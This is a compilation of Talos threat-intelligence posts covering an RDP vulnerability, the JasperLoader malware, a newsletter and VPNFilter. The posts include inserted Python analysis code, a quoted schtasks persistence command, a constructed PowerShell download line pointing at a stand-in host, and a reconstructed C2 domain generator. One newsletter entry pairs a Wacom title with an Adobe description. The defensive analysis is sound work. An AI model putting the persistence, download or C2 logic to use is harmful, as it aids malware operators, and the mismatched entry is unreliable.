
Talos releases coverage for 'wormable' Microsoft vulnerability

Last night, Cisco Talos released the latest SNORT® rule update, which includes coverage for the critical Microsoft vulnerability CVE-2019-0708.

The company disclosed this vulnerability last week as part of its monthly security update. This particular bug exists in Remote Desktop Services — formerly known as Terminal Services.

The vulnerability requires no user interaction and is pre-authentication. Microsoft specifically warned against this bug because it is "wormable," meaning future malware that exploits this vulnerability could spread from system to system. One of the most infamous examples of a worm was the WannaCry malware, which disabled major services across the globe in May 2017. An attacker could exploit this vulnerability by sending a specially crafted request to the target system's Remote Desktop Service via RDP.

Snort rule 50137 covers indicators associated with this vulnerability. You can learn more about this release at the Snort blog here.

Beers with Talos Ep. #53: Shiny happy election security (and ninjas)



Beers with Talos (BWT) Podcast Ep. #53 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 10, 2019 — Election security has been a dominant headline for some time, so it’s high time we take a look at what that landscape looks like — where we are today, and how we got there in the first place. (Hint: there were deeper unintended consequences than Shiny Happy People on REM’s “Out of Time” album.) We anticipate gathering some first-time listeners due to the topic of this podcast... to you we say welcome, and yes, it’s always like this.

Matt kicks us off today discussing the greatest nerd rock band of all time: Ninja Sex Party. If you haven’t heard of them, you are in the wrong and should fix that quickly.

The timeline:

  • 00:45 — Roundtable: The Dark Times are here, so we present to you, Ninja Sex Party.
  • 16:15 — Election Security background: Let’s start with secret restaurants and smoking pineapples
  • 22:30 — Thanks, Stipe. How REM set us up to fail, and what’s under the hood of the US voting system
  • 38:00 — Where we are now versus even a couple years ago
  • 53:40 — Closing thoughts and parting shots


Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).

Hosted by Mitch Neff (@MitchNeff).

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Sorpresa! JasperLoader targets Italy with a new bag of tricks

Nick Biasini and Edmund Brumaghin authored this blog post.

Executive summary


Over the past few months, a new malware loader called JasperLoader has emerged that targets Italy and other European countries with banking trojans such as Gootkit. We recently released a comprehensive analysis of the functionality associated with JasperLoader. Shortly after the publication of our analysis, the distribution activity associated with these campaigns halted. But after several weeks of relatively low volumes of activity, we discovered a new version of JasperLoader being spread. This new version features several changes and improvements from the initial version we analyzed. JasperLoader is typically used to infect systems with additional malware payloads which can be used to exfiltrate sensitive information, damage systems or otherwise negatively impact organizations.

The attackers behind this specific threat have implemented additional mechanisms to control where the malware can spread and are now taking steps to avoid analysis by sandboxes and antivirus companies. There's also a new command and control (C2) mechanism to facilitate communications between infected systems and the infrastructure being used to control them. The campaigns that are currently distributing JasperLoader continue to target Italian victims and further demonstrate that while JasperLoader is a relatively new threat, the developers behind it are continuing to actively refine and improve upon this malware at a rapid pace and introduce sophistication that is not commonly seen in financially motivated malware.

Delivery changes


As mentioned in our previous analysis of JasperLoader, the distribution campaigns attempting to spread this malware are relying heavily on certified email services in Italy. However, the actors have made some changes to the way distribution occurs.

The initial emails we saw contained ZIP files with VBS files inside them. These VBS files were similar to the VBS and DOCM files we saw in the previous campaign and began the infection process. The version with attached files didn't last long and was not very high in volume.

Shortly afterward, we saw a new shift away from using attachments directly. In the case shown below, you can see the initial email being sent through the typical certified email service that has been repeatedly leveraged by the actors behind JasperLoader.
Just as we saw previously, the email is written in Italian and states that the original message is included as an attachment. You can see the original email titled "postacert.eml" attached. The following pops up once the email is opened:
This is where the distribution process started to shift. There are no attachments in the email; instead, there is a hyperlink that makes a connection to hxxp://tribunaledinapoli[.]recsinc[.]com/documento.zip with a parameter that is referenced in the email. For example, above the full URL was hxxp://tribunaledinapoli[.]recsinc[.]com/documento.zip?214299. Note that the number 214299 is the number referenced in the email itself. When we first saw this change, we began to investigate, and initially it appeared to be benign. The URL leads to an HTTP 302 response from the web server. HTTP 302 (Found, originally described as "Moved Temporarily") is a redirect status code that has been abused by adversaries for years, including the use of 302 cushioning by exploit kits several years ago.
This particular 302 redirected to www.cnnic[.]cn, which is the Chinese Internet Network Information Center (CNNIC), the organization responsible for internet affairs in the People's Republic of China. Obviously, this isn't the place that an adversary would send a potential victim to get compromised. It was at this point that we started looking at potential geofencing.

Geofencing is a technique that some adversaries use to ensure that all the victims are from a particular region or country and that researchers like us have more difficulty tracking down the activity. It's something we've seen repeatedly used by advanced adversaries but is not commonly done with crimeware threats like JasperLoader. In order to make that determination, we routed our traffic through Italian IP space and tried to follow the same link.

When the traffic is routed through Italian IP space, the results are drastically different. The request is met with a ZIP file that contains a malicious VBS file that is similar to the samples we found attached to emails earlier in the week. Once this VBS file is executed, the infection process kicks off and the loader is installed.

As we observed in previous campaigns, JasperLoader continues to leverage domain shadowing and moves rapidly across attacker-controlled subdomains. The chart below shows the DNS resolution activity associated with one of the C2 domains leveraged by JasperLoader. The scope is fairly limited, but more than 95 percent of resolutions came from Italy, so the geofencing protections they put into place appear to be somewhat successful.
Let's now walk through the new infection process where we highlight some of the evolutions we've discovered.

JasperLoader functionality changes


The infection process associated with JasperLoader continues to feature multiple stages which are used to establish a foothold on systems, initiate communications with attacker-controlled infrastructure and implement the core functionality of the loader. While much of the process functions similar to what was described in our previous analysis of JasperLoader, there have been several notable changes to the malware's operation, which are described in the following sections.

Additional layers of obfuscation


Similar to what was previously seen in the JasperLoader infection process, the attackers rely upon several layers of obfuscation to attempt to hide the operation of the malware. In general, they leverage character replacement mechanisms and perform mathematical calculations at runtime to reconstruct the PowerShell instructions that will be executed on infected systems. This same process is used by the Visual Basic Script (VBS) downloader observed across these campaigns.
In current campaigns spreading JasperLoader, the attackers have introduced an additional layer of character replacement to further obfuscate the underlying PowerShell. Once the VBS has been deobfuscated, the underlying PowerShell is:
Replacing each of the characters in the previous image results in the Stage 1 PowerShell that is used to retrieve additional stages from attacker controlled servers. An example of this stage of PowerShell is:
This PowerShell is similar to what was seen in previous JasperLoader campaigns with a few notable differences.
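As an added illustration (not code from the JasperLoader samples or from Talos), the following Python deobfuscator handles the two layers just described: it evaluates `[char]` arithmetic, joins the string pieces, and then applies the trailing `-replace` chain the way PowerShell would. The obfuscated input is constructed for this example; the real campaign's replacement tables and filler characters differ from sample to sample.

```python
import re

# Constructed sample in the style described above (not a real JasperLoader
# string): literal fragments and [char] arithmetic concatenated, then a chain
# of -replace operators that swaps filler characters back out at runtime.
OBFUSCATED = (
    "('I'+[char](110)+'v#o'+[char](100+7)+'e-W#eb'+[char](41*2)+'e'+[char](113)"
    "+'u#est~-U#ri~h'+[char](116)+'tp://exa#mple.inva#lid/s1.ps1') "
    "-replace '~',' ' -replace '#',''"
)

# Shape handled: ( <pieces joined by +> ) followed by zero or more -replace clauses.
OUTER_RE = re.compile(r"\s*\((.*)\)((?:\s*-replace\s+'[^']*','[^']*')*)\s*", re.DOTALL)
TOKEN_RE = re.compile(r"'((?:[^']|'')*)'|\[char\]\(([^)]*)\)|\+|\s+")
REPLACE_RE = re.compile(r"-replace\s+'([^']*)','([^']*)'")


def eval_arith(expr: str) -> int:
    """Evaluate integer + - * with parentheses by recursive descent (no eval())."""
    compact = expr.replace(" ", "")
    tokens = re.findall(r"\d+|[-+*()]", compact)
    if "".join(tokens) != compact:
        raise ValueError(f"unsupported arithmetic: {expr!r}")
    pos = 0

    def expression():
        nonlocal pos
        value = term()
        while pos < len(tokens) and tokens[pos] in "+-":
            op = tokens[pos]
            pos += 1
            rhs = term()
            value = value + rhs if op == "+" else value - rhs
        return value

    def term():
        nonlocal pos
        value = atom()
        while pos < len(tokens) and tokens[pos] == "*":
            pos += 1
            value *= atom()
        return value

    def atom():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "(":
            value = expression()
            pos += 1  # consume ')'
            return value
        if tok == "-":
            return -atom()
        return int(tok)

    result = expression()
    if pos != len(tokens):
        raise ValueError(f"trailing tokens in {expr!r}")
    return result


def deobfuscate(ps: str) -> str:
    """Rebuild the string the obfuscated expression evaluates to."""
    m = OUTER_RE.fullmatch(ps)
    if not m:
        raise ValueError("expression is not in the (concat) -replace ... shape")
    body, clauses = m.group(1), m.group(2)
    pieces = []
    pos = 0
    while pos < len(body):
        t = TOKEN_RE.match(body, pos)
        if not t:
            raise ValueError(f"unexpected text at offset {pos}: {body[pos:pos + 20]!r}")
        if t.group(1) is not None:                 # 'literal' ('' is an escaped quote)
            pieces.append(t.group(1).replace("''", "'"))
        elif t.group(2) is not None:               # [char](arithmetic)
            pieces.append(chr(eval_arith(t.group(2))))
        pos = t.end()
    text = "".join(pieces)
    # PowerShell's -replace is regex-based and case-insensitive; apply clauses in order.
    for pattern, repl in REPLACE_RE.findall(clauses):
        text = re.sub(pattern, repl.replace("''", "'"), text, flags=re.IGNORECASE)
    return text


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
```

The arithmetic goes through a small recursive-descent parser rather than eval(), so hostile samples can be fed through it safely, and anything outside the expected shape raises instead of guessing; for a new sample, the usual first step is to paste the string that follows the VBS's own character-swap into OBFUSCATED and extend the token regex for whatever construct the parser rejects.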

Decoy documents


As can be seen in the PowerShell associated with Stage 1, a PDF is retrieved from the specified URL and displayed to the user. This PDF is not overtly malicious and is simply designed to function as a decoy document so that when a user executes the VBS, there's an expected result.
While victims will simply see the PDF above, in the background, the infection process is continuing with the malware attempting to retrieve Stage 2.

Geolocation filtering


One of the changes made in JasperLoader is the introduction of additional geolocation-based filtering. Geolocation-based filtering was also being leveraged during the delivery stage of the infection process. In previous versions of JasperLoader, the malware would use the Get-UICulture PowerShell cmdlet at each stage of the infection process and terminate if the system was configured to use the language pack associated with People's Republic of China, Russia, Ukraine or Belarus. The latest version of JasperLoader has added an additional check for Romanian and will exit if any of these language settings are in use.

Virtual machine/Sandbox detection


Another new feature added in the latest version of JasperLoader is detection of hypervisor-based environments. In many cases, malware will perform various checks to determine whether it is being executed in a virtual environment and terminate execution to avoid being analyzed by sandbox or anti-malware solutions.

The latest version of JasperLoader has introduced mechanisms that query the Windows Management Instrumentation (WMI) subsystem to obtain the model of the system that is being infected. The model identifier is then checked to see if it matches one of the following hypervisors:
  • VirtualBox
  • VMware
  • KVM
If so, the malware terminates execution and does not attempt to perform any additional actions on the system. These same checks are performed at each stage of the infection process.

Stage 3 functionality/Payload retrieval


There have been minor changes at Stage 2, but they are mostly related to file storage locations, file naming conventions and other characteristics that are frequently modified on a campaign-by-campaign basis; the overall functionality and process of retrieving, deobfuscating and executing Stage 2 to obtain Stage 3 remains relatively unchanged. For details of how this process works, please refer to our previous blog here.

The majority of the ongoing development activity appears to have been focused on Stage 3 of the JasperLoader infection process as that is where most of the JasperLoader functionality resides. The latest version of JasperLoader has changed how the malware attempts to persist across reboots, has introduced mechanisms to protect C2 communications, and added more robust mechanisms for ensuring that updates to JasperLoader get propagated efficiently to all of the systems that are part of the JasperLoader botnet.

Persistence mechanism


In previous versions of JasperLoader, the malware would obtain persistence on infected systems by creating a malicious Windows shortcut (LNK) in the Startup folder on the system. The latest version of JasperLoader accomplishes this using the Task Scheduler, as well. A scheduled task is created on infected systems using the following syntax:

schtasks.exe /create /TN "Windows Indexing Service" /sc DAILY /st 00:00 /f /RI 20 /du 24:59 /TR (Join-Path $bg_GoodPAth 'WindowsIndexingService.js');


This creates a Scheduled Task that will relaunch JasperLoader periodically. If this process fails, JasperLoader will then revert back to the use of the shortcut for persistence.
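To hunt for this persistence mechanism, the following Python script (an added example, not Talos tooling) parses exported or on-disk scheduled-task XML and flags tasks whose action runs a script file or script host from a user-writable directory, which is what the schtasks line above produces. The task XML is constructed to match that command; the install directory is a hypothetical stand-in for $bg_GoodPAth, which the page does not disclose.

```python
import ntpath
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|ps1|hta|bat|cmd)\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
USER_WRITABLE = re.compile(
    r"\\(AppData|Temp|ProgramData|Users\\[^\\]+\\(Desktop|Documents|Downloads))\\",
    re.IGNORECASE,
)

# Constructed task XML matching the schtasks line above.  The install directory is
# a hypothetical stand-in for $bg_GoodPAth, which the page does not disclose.
JASPER_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Windows Indexing Service</URI></RegistrationInfo>
  <Triggers><CalendarTrigger>
    <Repetition><Interval>PT20M</Interval><Duration>P1DT59M</Duration></Repetition>
    <StartBoundary>2019-05-20T00:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
  </CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\victim\AppData\Roaming\WindowsIndexingService.js</Command>
  </Exec></Actions>
</Task>"""

# Constructed benign task for contrast: a Windows binary under System32.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Defrag\ScheduledDefrag</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o</Arguments>
  </Exec></Actions>
</Task>"""


def assess_task(xml_data) -> dict:
    """Flag a task whose action runs a script file or script host from a user-writable path."""
    root = ET.fromstring(xml_data)
    name = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    reasons, script_action, writable_path = [], False, False
    for exc in root.findall("t:Actions/t:Exec", NS):
        cmd = exc.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exc.findtext("t:Arguments", default="", namespaces=NS)
        target = f"{cmd} {args}".strip()
        if SCRIPT_EXT.search(target) or ntpath.basename(cmd).lower() in SCRIPT_HOSTS:
            script_action = True
            reasons.append(f"script action: {target}")
        if USER_WRITABLE.search(target):
            writable_path = True
            reasons.append(f"user-writable path: {target}")
    interval = root.findtext(".//t:Repetition/t:Interval", default="", namespaces=NS)
    if interval:
        reasons.append(f"repeats every {interval}")
    return {"name": name, "suspicious": script_action and writable_path, "reasons": reasons}


def scan_tasks_dir(root_dir=r"C:\Windows\System32\Tasks") -> list:
    """Walk the on-disk task store (needs admin on Windows) and return suspicious tasks."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    # Task files are UTF-16 XML; the parser honours the declaration.
                    result = assess_task(fh.read())
            except (OSError, ET.ParseError):
                continue
            if result["suspicious"]:
                result["file"] = path
                findings.append(result)
    return findings


if __name__ == "__main__":
    for sample in (JASPER_TASK, BENIGN_TASK):
        print(assess_task(sample))
```

Run scan_tasks_dir() as an administrator on a Windows host to walk the task store, or pass the output of `schtasks /query /tn "<name>" /xml` to assess_task directly. A script action alone is not enough to alert on (plenty of legitimate automation runs .ps1 files), which is why the verdict also requires a user-writable install path; the repetition interval is recorded as context for the analyst.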

Failback C2 mechanism


One of the features that has been added to JasperLoader is a failback C2 domain retrieval mechanism that allows for time-based fluxing. A default C2 domain is specified. If that domain is not available, the current date on the system is used to generate a series of failback domains that the malware will attempt to use for C2 communications.
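The text does not publish the generation algorithm, so the following Python is an added, illustrative reconstruction of the behaviour described (not JasperLoader's own code): a hard-coded default C2, and a list of failback names derived from the current date when the default is unreachable. The seed, hash, TLD list, per-day count and the default domain are assumptions chosen for the example. It also shows the defender's side of such a scheme: once the generator is recovered from a sample, the next few days' names can be precomputed and blocked or sinkholed before the bots roll over to them.

```python
import hashlib
from datetime import date, timedelta
from typing import Callable, List, Optional

# Illustrative constants (assumptions for this example, not values from JasperLoader).
DEFAULT_C2 = "c2.example.invalid"
SEED = b"jasperloader-failback-example"
TLDS = (".com", ".net", ".info")
DOMAINS_PER_DAY = 5
DEMO_DAY = date(2019, 5, 20)


def failback_domains(day: date, count: int = DOMAINS_PER_DAY) -> List[str]:
    """Derive the day's candidate domains from the date alone, so bot and operator agree."""
    names = []
    for i in range(count):
        digest = hashlib.sha256(SEED + day.isoformat().encode() + bytes([i])).hexdigest()
        label = digest[:12]                               # 12 hex chars as the host label
        tld = TLDS[int(digest[12:14], 16) % len(TLDS)]    # next byte picks the TLD
        names.append(label + tld)
    return names


def select_c2(reachable: Callable[[str], bool], today: date) -> Optional[str]:
    """Bot side: try the hard-coded default first, then today's generated list in order."""
    for candidate in [DEFAULT_C2] + failback_domains(today):
        if reachable(candidate):
            return candidate
    return None


def blocklist_window(today: date, days_back: int = 1, days_ahead: int = 2) -> List[str]:
    """Defender side: precompute names around today so DNS blocks land before bots move."""
    names = []
    for offset in range(-days_back, days_ahead + 1):
        names.extend(failback_domains(today + timedelta(days=offset)))
    return names


if __name__ == "__main__":
    print(failback_domains(DEMO_DAY))
    # Simulate the default C2 being taken down: the bot falls through to the first
    # generated name for the day.
    print(select_c2(lambda d: d != DEFAULT_C2, DEMO_DAY))
    print(len(blocklist_window(DEMO_DAY)))
```

Because the bot's clock is the only input, a sandbox run with the system date advanced will emit the names for that date, which is the usual way to enumerate a time-based scheme once the seed and hash are known from the Stage 3 script.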

Bot registration


The malware has also implemented a new bot registration and ID generation mechanism and utilizes different pieces of information to create a unique identifier for each system than what was seen in previous versions of JasperLoader. As before, this information is communicated to the C2 as parameters within an HTTP GET request and is generated using the following:

Interesting PowerShell artifacts


One interesting artifact present in the PowerShell associated with Stage 3 of JasperLoader is in the function responsible for defining the C2 domain to use for future communications. The function is called BG_SelectDomen(). The word "domen" translates to "domain" and is a word that is widely used in multiple countries, including Romania.
While this is a low-confidence indicator, it is interesting in relation to the apparent targeting of this malware as well as the geolocational checking that is performed to determine whether it should continue to execute on infected systems.

Payload delivery


During our analysis of the latest JasperLoader campaigns, we were unable to receive the commands and URL information required to obtain a malicious PE32 from the attacker's C2 infrastructure. We did note that the C2 communications channel remained active and was beaconing.
This may be due to JasperLoader not being actively used to spread additional payloads at this time. The botnet operator may be attempting to obtain JasperLoader infections in order to build out capabilities so that they can be monetized for the purposes of leveraging the botnet to distribute additional malware in the future. We have seen reports indicating that GootKit may again be the payload of choice for this campaign. GootKit was the payload during the previous campaign we analyzed, so its inclusion in this campaign seems likely.

Conclusion


As illustrated by these new JasperLoader campaigns, adversaries are always going to take steps to try and increase their ability to infect victims, while at the same time evading detection and analysis. JasperLoader has taken that to the extreme and has quickly developed additional capabilities and added additional layers of obfuscation, while at the same time taking steps to evade virtual machines and geofence their victims in Italy. The majority of these changes came rapidly and demonstrate the author's commitment to making JasperLoader a robust, flexible threat that can be updated rapidly as security controls and detection capabilities change. Despite all these steps, we are still able to derive enough intelligence to expose their activities and protect our customers and the general public from their malicious intentions.

JasperLoader is another prime example of how rapidly threats can change and illustrates just how important threat intelligence is to ensuring that organizations are prepared to defend against them even as adversaries are constantly investing time, effort, and resources into improving upon their tools as they attempt to stay ahead of defenses deployed on enterprise networks. As techniques become less effective, cybercriminals will continue to move to other techniques to maximize their success in achieving their mission objectives. While JasperLoader is still relatively new compared to other established malware loaders out there, its developers have demonstrated that they will continue to improve upon this malware and leverage it against organizations. It is expected that as this botnet continues to grow, it will likely become more heavily leveraged for the distribution of various malware payloads as the operators of this botnet can make use of already infected systems at the push of a button or the issuance of a command.

Coverage

Ways our customers can detect and block this threat are listed below.


Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.


Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise


The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of JasperLoader activity.

Domains


A list of domains observed to be associated with JasperLoader are below.

breed[.]wanttobea[.]com
zzi[.]aircargox[.]com
nono[.]littlebodiesbigsouls[.]com
tribunaledinapoli[.]recsinc[.]com
tribunaledinapoli[.]prepperpillbox[.]com
tribunaledinapoli[.]lowellunderwood[.]com
tribunaledinapoli[.]rntman[.]com

IP addresses


A list of IP addresses observed to be associated with JasperLoader are below.

185[.]158[.]251[.]171
185[.]158[.]249[.]116

Hashes


A list of file hashes (SHA256) observed to be associated with JasperLoader are below.

052c9895383eb10e4ad5bec37822f624e443bbe01700b1fe5abeeea757456aed
54666103a3c8221cf3d7d39035b638f3c3bcc233e1916b015aeee2539f38f719
ee3601c6e111c42d02c83b58b4fc70265b937e9d4d153203a4111f51a8a08aab

Threat Source newsletter (May 23)


Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Election security is a touchy — and oftentimes depressing — topic of conversation. So why not let Beers with Talos bring some levity, and more importantly, expertise, to the conversation? The latest episode focuses solely on election security, as Matt Olney runs down what he’s learned recently from spending time with various governments.

On the research end of things, we released a post earlier this week outlining the details of a new campaign called “BlackWater” that we believe could be connected to the MuddyWater APT.

And since we know everyone was waiting on this, yes, there’s coverage for that wormable Microsoft bug everyone was talking about.

There was no Threat Roundup last week, but it’ll be back tomorrow.

Upcoming public engagements with Talos

Location: Industriens Hus, Copenhagen, Denmark
Date: May 29
Speaker: Paul Rascagnères
Synopsis: Paul will give an overview of an espionage campaign targeting the Middle East that we called “DNSpionage.” First, he will go over the malware and its targets and then talk about the process the attackers used to redirect DNS. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security.

Location: ILEC Conference Centre, London, England
Date: June 5
Speaker: Paul Rascagnères
Synopsis: Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it’s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker. 

Cyber Security Week in Review

  • The U.S. Department of Homeland Security issued a warning this week against Chinese-manufactured drones. Some of the drones may be collecting their users’ personal data and transferring it back to China.
  • A forum dedicated to hijacking online accounts and carrying out SIM-swapping attacks has been hacked. More than 113,000 users on OGusers had their login information, IP addresses and private messages exposed in an attack.
  • Cisco released patches for many of its devices, fixing a vulnerability in its Secure Boot process. However, the patches will only be released in waves, and some devices could remain vulnerable until November.
  • Some of the most popular Docker containers are open to attacks. Researchers recently discovered that 20 percent of the 1,000 most used containers are impacted by a misconfiguration, including those belonging to Microsoft, Monsanto and the British government.
  • San Francisco recently passed a ban on governmental use of facial recognition technology. The new law is likely to spark debates across the country between privacy advocates and law enforcement agencies.
  • The Trump administration is considering blacklisting Hikvision, a Chinese tech company that manufactures surveillance cameras. The move would prevent the company from purchasing American technology and would create another point of tension between the two countries.
  • Google disclosed that some G Suite users’ passwords have been mistakenly stored in plaintext for nearly 14 years. The company said the passwords stayed in its secure infrastructure, and the problem has been fixed.
  • Ireland opened a GDPR investigation into Google this week, specifically how the company uses personal data for advertising. Regulators say users’ personal information is stored by Google and then sold off to advertisers without their knowledge.
  • One year after the GDPR went into effect, Europe has received an estimated 145,000 privacy complaints.
  • The latest update to Mozilla Firefox fixes 21 security vulnerabilities, two of them rated “critical.” There are also new options for users to block “digital fingerprinting” on all sites.

Notable recent security issues

Title: Coverage available for critical vulnerability in Microsoft Remote Desktop Protocol
Description: Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 79 vulnerabilities, 22 of which are rated “critical," 55 that are considered "important" and one "moderate." This release also includes two critical advisories: one covering Microsoft Live accounts and another addressing updates to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft’s products, including the Scripting Engine, the Microsoft Edge web browser and GDI+.
Snort SIDs: 50014 - 50025

Title: Multiple vulnerabilities in Wacom Update Helper
Description: Adobe disclosed 87 vulnerabilities in a variety of its products as part of its monthly security update. The majority of the bugs exist in Adobe Acrobat and Acrobat Reader. There are also critical arbitrary code execution vulnerabilities in Adobe Flash Player and Reader.
Snort SIDs: 48293, 48294, 49189, 49190, 49684, 49685

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 6dfaacd6f16cb86923f21217ca436b09348ee72b34849921fed2a17bddd59310
MD5: 7054c32d4a21ae2d893a1c1994039050
Typical Filename: maftask.zip
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Advancedmaccleaner::tpd
  
SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b.bin
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: wup.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG


One year later: The VPNFilter catastrophe that wasn't


Cisco Talos first disclosed the existence of VPNFilter on May 23, 2018. The malware made headlines across the globe, as it was a sophisticated piece of malware developed by a nation state, infecting half a million devices, and poised to cause havoc. Yet the attack was averted. The attacker’s command and control (C2) infrastructure was seized by the FBI, preventing the attacker from broadcasting orders to compromised devices. The attacker lost control of the infected systems, and potential catastrophe was prevented.

This was a wakeup call that alerted the cybersecurity community to a new kind of state-sponsored threat — a vast network of compromised devices across the globe that could stow away secrets, hide the origins of attacks and shut down networks.

This is the story of VPNFilter, and the catastrophe that was averted.

Network as the target


Network infrastructure is a tempting and useful target to attackers. Like any computing system, network devices such as routers and switches may contain vulnerabilities or misconfigurations that allow attackers to compromise the device. Once compromised, the device can be used as a point of incursion to search out and attack additional further systems, or the functionality of the device can be changed to the attacker’s will, and network traffic intercepted, modified or rerouted. Unlike many other computing systems, routers and switches are unlikely to be running anti-virus software, or be under active supervision by eagle-eyed administrators who may notice unusual activity.

In the weeks prior to the disclosure of VPNFilter, it was clear that network infrastructure was increasingly the target of state-sponsored threat actors. The activities of a threat actor associated with Russia had been observed and government agencies across the world published advisories warning organisations to take note [1, 2, 3].

Traces of VPNFilter


Someone registered the unobtrusive domain toknowall.com in December 2015. On May 4, 2017, that domain was changed to point to an IP address hosted in France, after initially pointing at a Bulgarian hosting provider. Although nobody knew it at the time, this was one of the means by which the attackers were communicating with VPNFilter. This domain would remain active until the threat was neutralised on May 23, 2018.

By the end of August 2017, the FBI had been made aware of a home router exhibiting unusual behaviour. The device attempted to connect to a Photobucket account to download an image, behaviour that was clearly being driven by a malware infection [4].

In fact, both the Photobucket accounts and the toknowall.com domain were hosting images in which the IP address of the C2 server, used by the threat actor to issue instructions to the malware, was hidden, disguised within the EXIF metadata of the image.
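As an added example (not VPNFilter code or Talos tooling), the following Python walks the EXIF/TIFF metadata of a JPEG and reports IPv4-looking strings found in its tag values. The image is constructed inside the block; which EXIF field the real malware used and how the address was disguised are not stated on this page, so the example assumes a plain dotted quad in ImageDescription (tag 0x010E). The IFD walker returns every tag's raw bytes, so a different decoding can be plugged in once a sample shows which field and encoding are in play.

```python
import re
import struct

TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}   # TIFF field type -> bytes per value
ASCII = 2
IMAGE_DESCRIPTION = 0x010E
IPV4 = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_ifd0(tiff: bytes) -> dict:
    """Walk the first IFD of a TIFF blob (the APP1 payload after 'Exif\\0\\0') -> {tag: raw bytes}."""
    order = tiff[:2]
    if order == b"II":
        e = "<"
    elif order == b"MM":
        e = ">"
    else:
        raise ValueError("not a TIFF header")
    magic, ifd_off = struct.unpack(e + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    count = struct.unpack_from(e + "H", tiff, ifd_off)[0]
    entries = {}
    for i in range(count):
        off = ifd_off + 2 + 12 * i
        tag, typ, n = struct.unpack_from(e + "HHI", tiff, off)
        size = TYPE_SIZE.get(typ, 1) * n
        if size <= 4:                                 # short values live inside the entry
            entries[tag] = tiff[off + 8:off + 8 + size]
        else:                                         # longer values are pointed to
            val_off = struct.unpack_from(e + "I", tiff, off + 8)[0]
            entries[tag] = tiff[val_off:val_off + size]
    return entries


def tiff_from_jpeg(jpeg: bytes) -> bytes:
    """Find the APP1 (Exif) segment of a JPEG and return its TIFF payload."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        seg_len = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        if marker == 0xE1 and jpeg[pos + 4:pos + 10] == b"Exif\x00\x00":
            return jpeg[pos + 10:pos + 2 + seg_len]
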